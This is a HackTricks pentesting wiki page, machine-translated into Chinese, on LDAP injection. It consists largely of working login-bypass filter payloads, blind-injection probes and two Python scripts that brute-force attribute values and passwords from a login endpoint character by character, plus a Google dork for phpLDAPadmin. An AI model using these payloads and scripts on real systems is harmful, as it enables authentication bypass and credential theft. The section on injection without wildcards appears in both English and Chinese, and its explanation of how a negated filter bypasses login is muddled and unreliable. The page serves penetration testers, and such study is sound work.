hacktricks/pentesting-web/ldap-injection.md
2023-08-03 19:12:22 +00:00

284 lines
13 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# LDAP注入
## LDAP注入
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* 你在一家**网络安全公司**工作吗你想在HackTricks中看到你的**公司广告**吗?或者你想获得**PEASS的最新版本或下载PDF格式的HackTricks**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品——[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass),或**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**
</details>
<img src="../.gitbook/assets/i3.png" alt="" data-size="original">\
**赏金猎人提示****注册**Intigriti一个由黑客创建的高级**赏金猎人平台**!立即加入我们的[**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达**$100,000**的赏金!
{% embed url="https://go.intigriti.com/hacktricks" %}
## LDAP注入
### **LDAP**
**如果你想知道什么是LDAP请访问以下页面**
{% content-ref url="../network-services-pentesting/pentesting-ldap.md" %}
[pentesting-ldap.md](../network-services-pentesting/pentesting-ldap.md)
{% endcontent-ref %}
**LDAP注入**是一种用于利用基于**用户输入**构建**LDAP语句**的**Web**应用程序的攻击。当应用程序未能正确对用户输入进行**清理**时可以使用本地代理修改LDAP语句。
{% file src="../.gitbook/assets/en-blackhat-europe-2008-ldap-injection-blind-ldap-injection.pdf" %}
**过滤器** = ( filtercomp )\
**Filtercomp** = and / or / not / item\
**And** = & filterlist\
**Or** = |filterlist\
**Not** = ! filter\
**Filterlist** = 1\*filter\
**Item**= simple / present / substring\
**Simple** = attr filtertype assertionvalue\
**Filtertype** = _'=' / '\~=' / '>=' / '<='_\
**Present** = attr = \*\
**Substring** = attr ”=” \[initial] \* \[final]\
**Initial** = assertionvalue\
**Final** = assertionvalue\
**(&)** = 绝对TRUE\
**(|)** = 绝对FALSE
例如:\
`(&(!(objectClass=Impresoras))(uid=s*))`\
`(&(objectClass=user)(uid=*))`
你可以访问数据库,其中可能包含许多不同类型的信息。
**OpenLDAP**如果有2个过滤器到达只执行第一个过滤器。\
**ADAM或Microsoft LDS**使用2个过滤器会抛出错误。\
**SunOne Directory Server 5.0**:执行两个过滤器。
**发送正确语法的过滤器非常重要,否则将抛出错误。最好只发送一个过滤器。**
过滤器必须以`&`或`|`开头\
示例:`(&(directory=val1)(folder=public))`
`(&(objectClass=VALUE1)(type=Epson*))`\
`VALUE1 = *)(ObjectClass=*))(&(objectClass=void`
然后:`(&(objectClass=`**`*)(ObjectClass=*))`**将是第一个过滤器(执行的过滤器)。
### 登录绕过
LDAP支持多种格式来存储密码明文、md5、smd5、sh1、sha、crypt。因此无论你在密码中插入什么它都会被哈希处理。
```bash
user=*
password=*
--> (&(user=*)(password=*))
# The asterisks are great in LDAPi
```
```bash
user=*)(&
password=*)(&
--> (&(user=*)(&)(password=*)(&))
```
```bash
user=*)(|(&
pass=pwd)
--> (&(user=*)(|(&)(pass=pwd))
```
```bash
user=*)(|(password=*
password=test)
--> (&(user=*)(|(password=*)(password=test))
```
```bash
user=*))%00
pass=any
--> (&(user=*))%00 --> Nothing more is executed
```
```bash
user=admin)(&)
password=pwd
--> (&(user=admin)(&))(password=pwd) #Can through an error
```
```bash
username = admin)(!(&(|
pass = any))
--> (&(uid= admin)(!(& (|) (webpassword=any)))) —> As (|) is FALSE then the user is admin and the password check is True.
```
```bash
username=*
password=*)(&
--> (&(user=*)(password=*)(&))
```
```bash
username=admin))(|(|
password=any
--> (&(uid=admin)) (| (|) (webpassword=any))
```
#### 列表
* [LDAP\_FUZZ](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP\_FUZZ.txt)
* [LDAP 属性](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP\_attributes.txt)
* [LDAP PosixAccount 属性](https://tldp.org/HOWTO/archived/LDAP-Implementation-HOWTO/schemas.html)
### 盲 LDAP 注入
您可以强制返回 False 或 True 响应来检查是否返回任何数据,并确认可能存在盲 LDAP 注入:
```bash
#This will result on True, so some information will be shown
Payload: *)(objectClass=*))(&objectClass=void
Final query: (&(objectClass= *)(objectClass=*))(&objectClass=void )(type=Pepi*))
```
```bash
#This will result on True, so no information will be returned or shown
Payload: void)(objectClass=void))(&objectClass=void
Final query: (&(objectClass= void)(objectClass=void))(&objectClass=void )(type=Pepi*))
```
#### 转储数据
您可以迭代ASCII字母、数字和符号
```bash
(&(sn=administrator)(password=*)) : OK
(&(sn=administrator)(password=A*)) : KO
(&(sn=administrator)(password=B*)) : KO
...
(&(sn=administrator)(password=M*)) : OK
(&(sn=administrator)(password=MA*)) : KO
(&(sn=administrator)(password=MB*)) : KO
...
```
### 脚本
#### **发现有效的LDAP字段**
LDAP对象**默认包含多个属性**,可用于**保存信息**。您可以尝试**暴力破解所有这些属性以提取信息**。您可以在[**此处找到默认LDAP属性的列表**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP\_attributes.txt)。
```python
#!/usr/bin/python3
import requests
import string
from time import sleep
import sys
proxy = { "http": "localhost:8080" }
url = "http://10.10.10.10/login.php"
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"
attributes = ["c", "cn", "co", "commonName", "dc", "facsimileTelephoneNumber", "givenName", "gn", "homePhone", "id", "jpegPhoto", "l", "mail", "mobile", "name", "o", "objectClass", "ou", "owner", "pager", "password", "sn", "st", "surname", "uid", "username", "userPassword",]
for attribute in attributes: #Extract all attributes
value = ""
finish = False
while not finish:
for char in alphabet: #In each possition test each possible printable char
query = f"*)({attribute}={value}{char}*"
data = {'login':query, 'password':'bla'}
r = requests.post(url, data=data, proxies=proxy)
sys.stdout.write(f"\r{attribute}: {value}{char}")
#sleep(0.5) #Avoid brute-force bans
if "Cannot login" in r.text:
value += str(char)
break
if char == alphabet[-1]: #If last of all the chars, then, no more chars in the value
finish = True
print()
```
#### **特殊的盲LDAP注入无需"\*"**
This technique is used when the application filters the wildcard character "\*". However, it still allows us to perform a blind LDAP injection attack by leveraging other LDAP filter operators.
当应用程序过滤通配符字符"\*"时可以使用此技术。然而我们仍然可以利用其他LDAP过滤器操作符来执行盲LDAP注入攻击。
The basic idea is to use the "!" operator to negate the result of an LDAP filter condition. By injecting a payload that causes the condition to evaluate to false, we can bypass the filter and retrieve sensitive information.
基本思想是使用"!"操作符来否定LDAP过滤器条件的结果。通过注入一个导致条件评估为false的有效负载我们可以绕过过滤器并检索敏感信息。
For example, consider the following LDAP filter used to authenticate a user:
例如考虑以下用于验证用户的LDAP过滤器
```
(&(username=admin)(password=pass))
```
If the application filters the wildcard character "\*", we can't use the usual payload like `(username=*)(password=*)` to bypass the filter. However, we can use the "!" operator to negate the result of the condition:
如果应用程序过滤通配符字符"\*",我们无法使用通常的有效负载`(username=*)(password=*)`来绕过过滤器。然而,我们可以使用"!"操作符来否定条件的结果:
```
(&(username=admin)(!(password=pass)))
```
This payload will evaluate to false, allowing us to bypass the filter and potentially retrieve sensitive information.
这个有效负载将评估为false允许我们绕过过滤器并可能检索敏感信息。
Keep in mind that the specific syntax and operators may vary depending on the LDAP server implementation. It's important to understand the LDAP filter syntax and the available operators for the target server.
请记住具体的语法和操作符可能因LDAP服务器实现而异。重要的是要了解目标服务器的LDAP过滤器语法和可用的操作符。
```python
#!/usr/bin/python3
import requests, string
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"
flag = ""
for i in range(50):
print("[i] Looking for number " + str(i))
for char in alphabet:
r = requests.get("http://ctf.web??action=dir&search=admin*)(password=" + flag + char)
if ("TRUE CONDITION" in r.text):
flag += char
print("[+] Flag: " + flag)
break
```
### Google Dorks
### 谷歌黑客搜索语法
Google Dorks是一种使用谷歌搜索引擎的高级搜索技术用于发现特定的信息和漏洞。黑客可以使用Google Dorks来查找敏感信息、漏洞和其他有价值的目标。以下是一些常用的Google Dorks示例
- `site:`:限制搜索结果为特定网站。
- `filetype:`:限制搜索结果为特定文件类型。
- `intitle:`:限制搜索结果为包含特定标题的页面。
- `inurl:`限制搜索结果为包含特定URL的页面。
- `intext:`:限制搜索结果为包含特定文本的页面。
黑客可以使用这些Google Dorks来查找敏感信息如数据库备份文件、配置文件、登录凭证等。他们还可以使用这些Dorks来查找特定的漏洞如SQL注入、LDAP注入等。黑客可以通过在搜索中使用这些Dorks来定位目标并利用发现的漏洞进行攻击。
黑客使用Google Dorks时需要小心因为谷歌搜索引擎可能会记录搜索历史和活动。此外滥用Google Dorks可能会违反法律和道德规范。因此黑客在使用Google Dorks时应该遵守法律和道德准则并仅限于合法的渗透测试活动。
```bash
intitle:"phpLDAPadmin" inurl:cmd.php
```
### 更多有效载荷
{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection" %}
<img src="../.gitbook/assets/i3.png" alt="" data-size="original">\
**赏金猎人提示**: **注册** Intigriti一个由黑客创建的高级赏金猎人平台立即加入我们的 [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks),开始赚取高达 **$100,000** 的赏金!
{% embed url="https://go.intigriti.com/hacktricks" %}
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks 云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 推特 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 YouTube 🎥</strong></a></summary>
* 你在一家 **网络安全公司** 工作吗?想要在 HackTricks 中 **宣传你的公司**?或者想要获得 **PEASS 的最新版本或下载 HackTricks 的 PDF**?请查看 [**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现我们的独家 [**NFTs**](https://opensea.io/collection/the-peass-family) 集合 [**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* **加入** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass),或者在 **Twitter****关注** 我 [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* **通过向** [**hacktricks 仓库**](https://github.com/carlospolop/hacktricks) **和** [**hacktricks-cloud 仓库**](https://github.com/carlospolop/hacktricks-cloud) **提交 PR 来分享你的黑客技巧。**
</details>